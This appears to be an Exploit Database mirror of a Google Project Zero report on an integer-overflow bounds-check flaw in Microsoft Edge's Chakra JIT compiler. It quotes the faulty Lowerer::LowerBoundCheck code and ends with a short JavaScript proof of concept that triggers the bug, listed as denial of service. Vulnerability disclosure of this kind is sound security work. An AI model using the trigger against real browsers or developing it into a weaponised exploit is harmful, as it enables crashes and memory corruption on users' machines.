Microsoft Edge Chakra: JIT – ‘Lowerer::LowerBoundCheck’ Incorrect Integer Overflow Check

• Exploit Database
• 15 阅读

• 作者： Google Security Research
  日期： 2017-11-16
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/43153/

• /*
  Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1343
  
  Here's a snippet of the method.
  void Lowerer::LowerBoundCheck(IR::Instr *const instr)
  {
  ...
  if(rightOpnd->IsIntConstOpnd())
  {
  IntConstType newOffset;
  if(!IntConstMath::Add(offset, rightOpnd->AsIntConstOpnd()->GetValue(), &newOffset)) <<--- (a)
  {
  offset = newOffset;
  rightOpnd = nullptr;
  offsetOpnd = nullptr;
  }
  }
  ...
  if(!rightOpnd)
  {
  rightOpnd = IR::IntConstOpnd::New(offset, TyInt32, func);
  }
  }
  
  At (a), it uses "IntConstMath::Add" to check integer overflow. But the size of IntConstType equals to the size of pointer, and the "offset" variable is used as a 32-bit integer. So it may fail to check integer overflow on 64-bit system.
  
  PoC:
  */
  
  function f() {
  let arr = new Uint32Array(0x1000);
  for (let i = 0; i < 0x7fffffff;) {
  arr[++i] = 0x1234;
  }
  }
  
  f();